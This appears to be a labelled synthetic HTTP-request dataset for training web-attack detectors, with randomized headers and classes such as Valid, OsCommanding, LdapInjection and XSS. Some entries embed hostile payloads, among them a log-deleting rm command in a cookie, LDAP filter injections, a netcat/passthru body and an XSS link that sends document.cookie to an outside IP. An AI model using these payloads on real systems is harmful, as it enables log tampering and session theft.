GET /GIyTEQ/rmQOJYl.ZNM/lvZeR1V9zgmxxt/r2V8V/gPdOb-4JTqY/SGDp3ujXTC-cupdate@h/JPPWvq/obDc5FGpiZX0GeU3a/sea/eETuIKUo/5St_/7scripttBtuAszs.asp?nhjants=ooeewooAp&4access_logmu1oE=%3Atemoaid%26ih3winnt&nquEr=hgy8autoexeco0an+et&jFLlJESRRQ=ab&d7scriptvu=Asegupnao0urResaic&aeyr=%27%3B++shutdown--&uQullcn=injxtexdlddrerce&-2q.H=qd9bgyryedsrms&or=bcopylo+n%7Cot&es0=317733&Gei=%29on8o%27et%7Cy&hmowfsree=nba7m-qoVhtO HTTP/1.1
Host: www.fidwoup.de
Connection: close
Accept: text/*
Accept-Charset: macintosh, koi8-r, iso-10646-ucs-2;q=0.3, windows-1258;q=0.0
Accept-Encoding: 
Accept-Language: G-dhon;q=0.9, oesaid-keseNjSL;q=0.7, ldrarj-b
Cache-Control: only-if-cached
Client-ip: 213.3.132.26
Cookie: tWtblcaHheee=w8uJ@oibW_;otaRsh7a8eeeh4=279763111;ns6Rdooxhvgpsi=[;hxeLsedeuu=nmLseahjiild;qccleUizAd=ttogxHtrrtme3f53fh
Cookie2: $Version="28"
Date: Fri, 27 Aug 04 16:13:16 UTC
ETag: "XhnahbLsp63w2wtblrc"
Expect: qleceo=dsstvain;uas2soO=vedesi
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Sat, 16 Jun 07 05:14:19 CET
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: "UZcdnfx8.OFJUnD"
If-None-Match: ".3vSAzlK_hyqPamNNXkv"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Basic NWhhbjpzdWE5c1Rh
Range: 165737-,1988-39961,-87
Referer: /t0Et/iosr.pl
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: 7e8orryWavteAemwr
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 198x9357
Via: FTP/1.0 www.AiIsm.htm, FTP/7.5 47.233.105.198:49
Transfer-Encoding: BOe3e; 94roeiu=nBEeoaih
Upgrade: dzlnt/9.5, oo3l/2.4
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 8712797310669
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35309
Start - Id: 24423
class: Valid
GET /s2ZxsG/aQaXK@xxXvt.sh?aacciea=0577&hK4.Trc=tCbo1ew&oho=umnsdrop+ig HTTP/1.0
Host: 109.169.71.153:80
Connection: fenr
Accept: audio/*
Accept-Charset: cp-950;q=0.5, cp-936;q=0.0, x-mac-turkish;q=0.1, macintosh;q=0.2
Accept-Encoding: identity;q=0.7, deflate, deflate;q=0.1
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 197.118.98.197
Cookie: tsanjfxisein=yHiopla55nlN;btsrshteari2ao=at5cissa
Cookie2: $Version="9"
Date: Sun, 13 Jan 08 16:06:45 UTC
ETag: W/"G_mshkYfaYmY5lKV"
Expect: nsikhqu3
From: tetatv@lisp.com
If-Modified-Since: Sun, 01 Feb 04 12:13:47 CET
If-Unmodified-Since: Thu, 04 Mar 10 08:20:52 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jun 06 19:11:32 CET
Max-Forwards: 185
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: trHksd ftbdaee=elEtN
Authorization: lefenl olwpEwk=oter
Range: 5-1785,779-2938,62-7099
Referer: http://www.shtgx.fr/tneriiw4/kii4/nnycato.zip
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: e9eHJGYZJ http://www.sgsso.net
UA-CPU: StrongARM
UA-Disp: 705,814,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 179x8444
Via: 2.7 45.54.65.243, HTTP/6.0 201.241.220.241
Transfer-Encoding: deflate
Upgrade: I3r8es/8.7
Warning: 901 2.195.241.77 "iaii3i" "Fri, 29 May 09 17:59:10 GMT"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 568060558126
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24423
Start - Id: 23831
class: Valid
GET /jqjanacuaeet6s/bH5E.awrJ6LKeByHdl.jpg?e7ec=terr3thedtyptama&aalcssosooytebT=8cOu%40&tescAatr8=oTps%2F&T82ueusNrsg5=rri+omktng+nt&esuiEehlnefenat=t7&jehe5itnleu=4%5C7l&zahsnebseb=%5B+mjdAl4uhoefk HTTP/1.1
Host: www.nHnttB.ch:5
Connection: sKoahoEo
Accept: audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6-a0nqw;q=0.6, ksJ-h;q=0.6, jkdhhoD-oHian, hq-seemieE
Cache-Control: no-transform
Client-ip: 118.45.199.188
Cookie: sDitz=Nrnuyoirpat;rbaac5mnd1ycnh=catqei;emehuhbaeoclsos=095
Cookie2: $Version="65"
Date: Sun, 01 Nov 09 08:36:24 GMT
ETag: W/"L3jINxLdWgkcSg_n"
Expect: eItfioDt
From: dhmtihz@kNxat8.be
If-Modified-Since: Wed, 05 Sep 07 23:28:52 GMT
If-Unmodified-Since: Mon, 20 Apr 09 22:26:47 GMT
If-Match: "hvT.I5@X0NUZM.v"
If-None-Match: "MDzCU6iMo3KQ_4nv"
If-Range: *
Max-Forwards: 44
MIME-Version: 8.6
Pragma: aNn='t'
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: nmrr tNscqaE=suiwn
Range: 484-,58283-,553-
Referer: http://www.ane0oskc.it/cTsr/rtcs/5ope/hs6an/HlOi.zip
TE: chunked;q=0.7,trailers,trailers
Trailer: Host
User-Agent: Mozilla/9.0 (compatible; yvtset; Linux i386; dtneDutTno; pdb4tAkcOE)
UA-CPU: PowerPC
UA-Disp: 6328,311,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 646x2979
Via: 1.3 115.227.188.158
Transfer-Encoding: deflate
Upgrade: nay/4.9, hiEdJm/5.4
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 31488668121661585164
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23831
Start - Id: 36689
class: OsCommanding
GET /efezib_X/ietWRdtshnhyis4lr/byQyZC9/OrJAtMuyotmpsock_streamUb/otryRo2onj/Kscriptl2Gwp-vperl/JtnineJbe/n6ubHnnKnnstsep5qa/nlSrpq9O/4br0fSpNNHmc2vVt5fA/sYNv.asp?as7st=baleedcan9eeoeictndh&9hTO5=4088240 HTTP/1.1
Host: 45.237.200.105:074
Connection: 1hrihaye
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rtul-sam;q=0.4, 966ozr-LisGp9sT, s-elttreEr;q=0.5
Cache-Control: no-store
Cookie: eyEg8ot0TAnUm=Gnullbi;undonoi=iNSlmtyeeloaiu;esthcv8euhe2n=%0arm -f    /var/log/httpd/access_log   ;
Cookie2: $Version="695"
Date: Sun, 08 Jan 06 18:58:56 UTC
ETag: W/"D_mVt_z1yBdbmP9QR"
If-Modified-Since: Thu, 04 Mar 10 02:07:08 UTC
If-Unmodified-Since: Fri, 02 Apr 04 13:19:36 UTC
If-Match: "-zCloXuRtERDwPvB60vF"
If-None-Match: *
Max-Forwards: 7086
Range: -7095,53676-3575,2728-6
Referer: /17Uk/hhoPna/n5czm.mdb
User-Agent: woei1emrbe8o4d7d
UA-Color: color32
Via: FTP/8.6 149.98.221.92
----: -----------------------

null

End - Id: 36689
Start - Id: 5484
class: Valid
POST /oo5sdgnt/4TfR5Ek00DHW_.swf? HTTP/1.1
Content-Length: 157
Content-Language: sn
Content-Encoding: identity
Content-Location: http://rhEido5d.ch/nDtrn.txt
Content-MD5: cmVlbGhubG42Zmdzc2VyYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Jan 05 02:09:49 GMT
Last-Modified: Thu, 02 Nov 06 18:11:46 GMT
Host: www.nbvgaEeU.it:96586
Connection: keep-alive
Accept: video/*;q=0.9, text/xml;q=0.2, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 55.210.233.217
Cookie: suaei=dexd3o0c0ro;sadRcrtOpyhMir=NbiNltr;zstw1riwnu=poo;meeshchaobyn=anprocessing-instructionos;i8dii4lt=r7aqeDXzSwwd;dTiclAr5ZrutoOs=8193555324
Cookie2: $Version="8"
Date: Fri, 25 Apr 08 02:17:02 GMT
ETag: "77PNMkyNpKkNBeXH"
Expect: dm7lh
From: a2re@neunel.uk
If-Modified-Since: Thu, 07 Sep 06 10:50:01 GMT
If-Unmodified-Since: Mon, 02 Feb 04 23:02:09 GMT
If-Match: "hlMuA10sMdPQtd1y@M"
If-None-Match: "AtwjesK1oOqf1oH4h"
If-Range: Fri, 30 Dec 05 06:13:32 GMT
Max-Forwards: 7442
MIME-Version: 1.2
Pragma: hoc77dnn='ylRn'
Proxy-Authorization: cegiae nhwor=tnnO4
Authorization: Digest opaque="exn7"
Range: -1,49-10
Referer: /eo2ci/9toezhe.cfm
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.7 (X11; U; Open BSD i586 0.4; is-ci; rv:4.4.6) Gecko/31877974
UA-CPU: 68000
UA-Disp: 4823,2898,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 154x121
Via: 2.6 www.ncjtE.png, moS/6.7 www.3t5cs2R.html
Transfer-Encoding: meNg; Ntoea=i92fr
Upgrade: 7le/3.6, 8ss/3.8, jc8srs/9.3, rmha/3.0
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

aeotoaehi0r=12&ib5nttoif=sSanvgt&emtheawtii=1&stnedsce=FUa&uit6mpuH=r8A&rSduwjE=acO=?kvr?x5&.ssamGzo=9Ea.qo8R&otnhaKt0t=ftrdrop('&e2v7alo7uoitel=tt

End - Id: 5484
Start - Id: 38313
class: LdapInjection
GET /hOomndEraitoRz8tio/ugPrfDHKfU/tuei4et4da4a/xJUoeXB548U0S83oKCX@/gaetteomerEecotoaen/jzkRJyUTKmfrMGpBW8-w/fhjlc-pyce/23dRJi.1UTYtho4/oBk3sI.kwindow.openp/oa70emyvaH7idtac.gif?gtptyC=zts3o%29%28%26%28objectClass++%3D+++eu*%29&mz_PewB3Uq=20062989&rmee2Nnyjule=259&nfwtH=6ye24s&gtadnetDnxrr=%7Chl+ht2whereomddT HTTP/1.1
Host: 254.75.96.227
Connection: Jarxi
Accept: */*
Accept-Charset: iso-8859-1, iso-8859-8;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: clzeaa-pshEi;q=0.9, retBc-nsTu6ni, oj03tTIL-wiee;q=0.2, roatrn-aeae, ia-So;q=0.9
Cache-Control: no-store
Client-ip: 2.55.18.28
Cookie: cayeeeauEh=daxs;rsnrnsa0Lhnps9=siearsboolmteFgbp;olsde9Psiel=eOTT_Y
Cookie2: $Version="14"
Date: Tue, 17 Feb 04 10:44:44 GMT
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: A5rn=vo3il;oawRs
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Wed, 21 Apr 10 21:17:29 GMT
If-Unmodified-Since: Thu, 20 Mar 08 19:44:56 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Oct 08 16:00:50 CET
Max-Forwards: 166
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest realm
Range: 768701-8
Referer: /Hido.wav
TE: gzip;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 9.2; qt-aT; rv:2.4.7) Gecko/40705445
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/7.4 151.224.181.30
Transfer-Encoding: compress
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 81.254.156.128
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38313
Start - Id: 33087
class: Valid
PUT /gMjgxKr5GW/aeyxdyedm/wnosl2nliA8/dnyslsneayPiei7tli/rreaNrebotsttaiam8j/hhoRrair/wDrlsaditAr0cha/e0tiIfhs.dll? HTTP/1.0
Content-Length: 211
Content-Language: fmss
Content-Encoding: compress
Content-Location: /hheaod/tnmtr/zrNhta/oiLg7c4r.swf
Content-MD5: b2R0OHM0aTBjbmNlcnJnYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Sep 04 22:04:31 CET
Last-Modified: Sun, 08 Nov 09 06:32:08 GMT
Host: www.1u6nlw.ch
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 57.184.21.251
Cookie: 0yp=a;itcctawelhra=06;tuthtmrG=F~tv@/e;es1i=/savbscripts
Cookie2: $Version="16"
Date: Fri, 20 Aug 04 01:23:58 CET
ETag: "nPkcfXQ0B-EnbWGoKHs"
Expect: riunsaj2=aFHd;ernt=ssnittoc
From: 4a64appe@alsxipenr.biz
If-Modified-Since: Fri, 18 Feb 05 15:05:46 GMT
If-Unmodified-Since: Mon, 26 Oct 09 14:34:00 UTC
If-Match: *
If-None-Match: "w8@dfW8TGw3_SWa"
If-Range: "ogbhA1bt_G_HXT0I7"
Max-Forwards: 5010
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM dHJtc2Z3d2s4Y2FzYXNxYVRpOXQ3d2Vucndtb2luZWVhcnBmcw==
Authorization: ttif wH8t=a4aaes
Range: 96216-
Referer: http://EiNcyd.uk/enydoue/mcrLR/08Eeyxnl.asmx
TE: trailers
Trailer: TE
User-Agent: reD1izm/8.5
UA-CPU: 68000
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3560x1386
Via: 1.9 42.36.81.251:3, 5.4 220.20.41.116
Transfer-Encoding: identity
Upgrade: w57/8.5, enyae/0.7
Warning: 039 18.32.213.153 "1himeenD6aarst" "Wed, 25 Aug 04 07:02:03 UTC"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 36418274
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ttcAtqtivk4Mlg=7625093&Wxp_v_=4255684&avS=mi7m&ecc6eat=ThdT92usfz&rou=eyoxi&2BdLN= )ssxRuo&7yV2e9bxkdd4=tkafylibmzc)netcat &argcs2e=rJBOxRlC1&fYXvWu@QCSp4=6&rixcssecilaT=/boexmltecapassthruyal7&7emep=theai

End - Id: 33087
Start - Id: 46955
class: XSS
PUT /nX.Nuo/eJascewni3cst/Bedl___r_.asmx? HTTP/1.0
Content-Length: 305
Content-Language: i,zRioghe
Content-Encoding: compress
Content-Location: http://CpfEj.net/h7qul/eiAbeia.exe
Content-MD5: b3BuYWFvbmVzcmVyY3NwbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 08:01:04 CET
Last-Modified: Wed, 16 Nov 05 15:05:50 CET
Host: www.oceetmis9.fr:559
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=75325
Client-ip: 15.111.69.143
Cookie: drVFelniocUdi=A drfe;1ytspu2=fselectis'r=q2te0d;fdtni4khi=je09lr;isClisslKenratq=2026474687;nrta=wUE;5ZXCCtONUv4P=451
Cookie2: $Version="52"
Date: Tue, 20 Jan 04 14:17:27 CET
ETag: "NViduy7oqvlSc-i"
Expect: mexltil=sUytWu
From: trhir@9toer.gov
If-Modified-Since: Sun, 04 Apr 10 14:21:16 GMT
If-Unmodified-Since: Fri, 27 Mar 09 23:43:15 UTC
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: "ys@0adoX_F41_.aRsRgV"
If-Range: *
Max-Forwards: 22
MIME-Version: 5.4
Pragma: atuneta=r7E
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://cfbil.it/hbsA/nbuTslAm.asmx
TE: deflate
User-Agent: Mozilla/4.9 (Windows; U; Win98 9.9; ml-rt; rv:2.5.4) Gecko/13670894
UA-CPU: StrongARM
UA-Color: color8
Via: HTTP/9.5 94.53.182.200
Transfer-Encoding: compress
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ycmdGb=lNDRj7S&treerpe9Y5=<link   rel   ="   stylesheet      "  href =  "  javascript:   [window.open('http://140.157.209.165/isil.asmx'+document.cookie);]    "  >&aaenlo=03791226&a0aeaneimrsi=anc2gutihraElrLoeu&rANsmt4=EAOnn&07nhG=rdvr0t&h.FVXOmochaa=os9cwtxu1tv

End - Id: 46955
Start - Id: 25391
class: Valid
GET /lertm/5OCzreplaceK/lL.nxRQuvHI9n8AhBT/urnttohtn/c66Ar0v17GSQODHYQ/dm7irdownefali.asmx? HTTP/1.1
Host: www.ejsOl.com:80
Connection: dRqpL
Accept: image/png, video/mpeg;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lmhPcim-hdtdi;q=0.8, au-iio4Lma, ea5-hii;q=0.3, 9oEOei-mc, i-spe5d;q=0.0
Cache-Control: Ocyin1='nb'
Client-ip: 45.139.165.17
Cookie: osOhortejgns=7668675;rzaiheoot1i=ndMtdtinrhzb~window.opendba
Cookie2: $Version="522"
Date: Fri, 04 Sep 09 15:16:35 GMT
ETag: W/"AwwFK6TdmiSb1a7AjB"
Expect: 100-continue
From: drrovE@debi2e.fr
If-Modified-Since: Tue, 13 Apr 04 13:05:29 GMT
If-Unmodified-Since: Wed, 13 May 09 22:04:41 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Mar 04 19:27:29 UTC
Max-Forwards: 1532
MIME-Version: 9.0
Pragma: 94aO=tec4t
Proxy-Authorization: NTLM Yk9lb3N0ZWRvbXVtYXNpbXQzZXRzZHh3Y2hjV2F3dG02aW8=
Authorization: Digest response="49FB4ea1aBD77d8a41B0EeBD9BbeA577"
Range: 7820-,350834-024
Referer: http://www.sgerZd.it/Feren6n/niewieag/rowseeac/isamk/lznnn.dll
TE: trailers,chunked;q=0.8
Trailer: Accept
User-Agent: nnEetnx/4.3.4
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: deflate
Upgrade: aer/3.2, cuxRP7/3.1, tvea/5.6, A3e/4.9
Warning: 361 189.181.68.53 "fIjyiokT66aez" "Tue, 06 Apr 10 13:42:10 UTC"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 927015568705209514
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25391
Start - Id: 38881
class: LdapInjection
GET /tissioc9tApjchh/iTrMMG87hj-TvhqN_bbi/aw-f/nrifispw/t0j1jZydOKCVA/mioo/zCeZFFUT724MyREI/stys4a7Epo/ufeelupobEr/a6taeesa4nh1ztuirel.asp?j7=hwn%3Ase3er1mailC&fmQ3wBsystemchttpHt=teu+&J17W4u4iframech=%2Fori&LtIseut30n=3710931713&utfh=grOFlrYlyC4&vNduhpdiedrxeeG=%29+++%28+++%7C++%28++cn%3D*o%27brien*++%29%28mail+++%3D*o++%27brien*+++%29&bs=552046 HTTP/1.1
Host: 234.0.7.91:48345
Connection: close
Accept: image/*, text/xml;q=0.8, audio/basic;q=0.5
Accept-Charset: windows-1258, shift_jis, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 185.212.239.81
Cookie: hluNit=sYl;CexecKQbcatZI=5ecemrl;ossb=22;RVGZG7=i8rEnr\;fu8USckbRAR=re(;V_PQ=535818655
Cookie2: $Version="1"
Date: Sun, 09 Jul 06 02:04:34 UTC
ETag: W/"sTJpGFOPAFy.lHNa"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 13 May 07 11:55:06 UTC
If-Unmodified-Since: Tue, 21 Apr 09 17:39:38 CET
If-Match: "me2C6EiJeYW.QQY.Rk3a"
If-None-Match: *
If-Range: Sun, 20 Mar 05 03:02:42 CET
Max-Forwards: 3764
MIME-Version: 1.6
Pragma: avqey=srneu
Proxy-Authorization: Basic dGFkZmhzOnR2anRr
Authorization: Digest username="ep7anefI"
Range: 15934-,799-8058,-81465
Referer: http://onog.it/oass1/c1ioad/eaak/i13au.swf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (compatible; Konqueror/3.6; Mac OS X; isisIeoa; legs)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: 1.9 120.187.1.78, 3.0 www.iueOa4r.css, HTTP/8.4 179.101.100.188
Transfer-Encoding: gzip
Upgrade: p9rld/0.9, tneW2/8.4
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38881
Start - Id: 33497
class: Valid
PUT /lnbmnnrmt.sh? HTTP/1.1
Content-Length: 213
Content-Language: h6pg,dhmwselr,exomomE
Content-Encoding: identity
Content-Location: http://antio.cz/itmt/enitriaz/he0a8lg/seave.mdb
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 19 Dec 08 16:18:54 GMT
Host: 54.120.84.49
Connection: close
Accept: video/quicktime, audio/*, audio/basic;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.5
Accept-Language: leittger-itCtich;q=0.6, haz-S, Aht0i-scosit5, or-a
Cache-Control: no-store
Cookie: vN-k=ldropqhe;e3=nQL;eem=00;Opratwtscho=na0VqDEqk7B;cu=3e5le7;aTtofeac=eot$rC
Date: Tue, 20 Apr 10 13:42:46 CET
If-Match: "mI849jZhfEkcWAy13Gy"
If-Range: Thu, 14 Aug 08 14:21:43 CET
Max-Forwards: 8
MIME-Version: 8.2
Range: -41068,-23086
Referer: http://ala6a.it/c7hn.pdf
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 8.5; cf-s4; rv:0.9.9) Gecko/73559744
UA-Color: color8
----: --------------------------------------

hTsi4lr9ooccs=t ts&smeOpscursreEl=l1@gtlselblveufxp_d&gi=otEtHRsr&l2ssrsn2=2932690&regGo=428376042&rEan=hhoe&ellaay=e0dhomeW4ll3e&lenlsjznto4olTa=8775117&divdivprocessing-instructionQwT.cDv=94483&ted=zotGwgLWIsc

End - Id: 33497
Start - Id: 25949
class: Valid
GET /evtfdcEsEs/lshohdtlrzbherxk1Xmo/tfsDsl/m@eHC0/Qaocterzeee/winntoptJ/O67ah6fi/erllZ3ex7nNNee/JEs5AjP/thelpleaofy2noyrm.css?lxnn7ometwgsj6e=hLXSJOOoA&oefm3igq=an&tcE93dtoes2d=66712511 HTTP/1.1
Host: 24.160.80.244
Connection: vhnfnno
Accept: */*;q=0.4
Accept-Charset: koi8;q=0.8, cp-950, iso-8859-8-i, iso-2022-kr;q=0.2
Accept-Encoding: 
Accept-Language: le-poeuA, afAeIpee-sauot3me;q=0.1, ot3oh-b, Ilora-n;q=0.4
Cache-Control: no-transform
Client-ip: 123.181.132.140
Cookie: lrleoaaJ9nprl=Ehr>n6ide4c;ei3hetaxtr3=soHYF2v;treplaceU-0=9;qdrHiaat9heIT=o7m;otlz=eObatnsosst;1Uslsbeeatea=95591673
Cookie2: $Version="8"
Date: Fri, 25 Aug 06 08:18:57 GMT
ETag: W/"OAUdb_ftbJ4JQYe-EAz"
Expect: rnms2it=eIumt;ufdtRd
From: naaufvp@rOayez.uk
If-Modified-Since: Sat, 03 Apr 10 21:28:50 CET
If-Unmodified-Since: Wed, 22 Feb 06 11:01:25 GMT
If-Match: *
If-None-Match: "QK-FqgLxsdr3j3Z"
If-Range: "gqMjYTdkD-H0BCc7Y_"
Max-Forwards: 941
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: hsj6ug Ee6me=lshaee6
Authorization: Basic ZW1hbmlxOmluaWlydg==
Range: 27-,-8875
Referer: /oytr/3Dd2tzia/tniae/uo68oi.html
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 0.4; lF-nc; rv:2.8.3) Gecko/60035386
UA-CPU: StrongARM
UA-Disp: 973,4090,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5187x1770
Via: 6.2 www.Efmd.gif:074
Transfer-Encoding: eodho
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25949
Start - Id: 25838
class: Valid
GET /rOALqdHzjpoTQ9eFtA3v/Aviisoniodirebsr/Zexec/iu8zL2lR/6wtan/rF.1MJ-shB/NPm/a9WBouwXAjUP4CY/eqjJGHo.XJ25-n/srpTBVyAyxEwlYbQyQ2h/rasbrnvgry2qtebm6sjf.swf?5tdwmnlev=50536397&o5rrdl3=%3Cfe&tbeauadi5ye=6808754224&Ao43s6atdNntrdo=605&n7cogsy=uKvALm_TvSf&inqt=access_log++la%25document+a%3Faon&rac2e6aaeN4=03099&neit=06&erb0s5bXd=oXhctpTg2odsntfw&mtytvtnqmon2t1=9IxV_rz2dre&urjahn9eot=orlr&.kvJmlogUVlogKwgeth=eo+et9s+erhnwp-P HTTP/1.1
Host: 35.253.238.17
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1255, hz-gb-2312;q=0.4, iso-8859-4, us-ascii;q=0.1, x-mac-greek;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: toabi3oR-tutd32sa, ruefvT-ha
Cache-Control: no-cache
Client-ip: 86.70.55.101
Cookie: EwrsUlthleat=67;tblteRg4nt=r;dA.EfIformr=04229049;hnhR1i=7o;yAyc=433748;iorcunqhEniett=xto
Cookie2: $Version="141"
Date: Mon, 28 May 07 09:25:11 CET
ETag: W/"@c1u_iQtSdTkmyi_Cg"
Expect: 100-continue
From: Twtkst@ncRpac0.cz
If-Modified-Since: Fri, 12 Aug 05 10:41:25 UTC
If-Unmodified-Since: Tue, 10 Mar 09 16:33:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2645
MIME-Version: 9.6
Pragma: i3xaek=ltw
Proxy-Authorization: lpm4t aNaOhes=tssi
Authorization: Basic ZVBwbXRubDpyYTZn
Range: 1348-,-434,-02308
Referer: /atnn.msf
TE: trailers,deflate;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 9.1; ve-ha; rv:2.7.9) Gecko/49218269
UA-CPU: StrongARM
UA-Disp: 3806,956,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 836x634
Via: 9.5 196.224.129.184:41
Transfer-Encoding: compress
Upgrade: trtt/3.8
Warning: 992 www.rntsa.gif "cniolfanrse8awt" 
X-Forwarded-For: 99.126.193.7
X-Serial-Number: 49272432668202117
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25838
Start - Id: 27788
class: Valid
GET /MtroYe8anea2tso/eetewn3amJInkk/3e8heu/tYCCZIVCmEi6UVpIX.tiff?remxeerorct=768257 HTTP/1.0
Host: 185.228.148.221:0876
Connection: keep-alive
Accept: audio/*;q=0.1, image/gif
Accept-Charset: *;q=0.5
Accept-Encoding: identity, deflate, compress
Accept-Language: *;q=0.1
Cache-Control: Lup=rah2ns
Client-ip: 46.18.77.217
Cookie: 5osfEj8= ;dhmt=O ;_Iufa.W8=rborE
Cookie2: $Version="9"
Date: Sun, 24 Apr 05 05:27:20 UTC
ETag: "asqnX8rt1Izz8FLv-"
Expect: pntedb4t
From: omsc@oihc6.biz
If-Modified-Since: Sat, 07 Jul 07 17:31:03 GMT
If-Unmodified-Since: Sat, 17 Jan 04 23:03:03 GMT
If-Match: *
If-None-Match: "ZnNYGzaA@rYdPrghAD7O"
If-Range: *
Max-Forwards: 1594
MIME-Version: 9.4
Pragma: eobeix1i=e4fnaial
Proxy-Authorization: mntnor HgotSst=Rpgnni
Authorization: Basic dWx4YWg6YnpuYTI=
Range: -83593,-88
Referer: http://t06Urc.ch/tinnso.cfm
TE: trailers,trailers,trailers
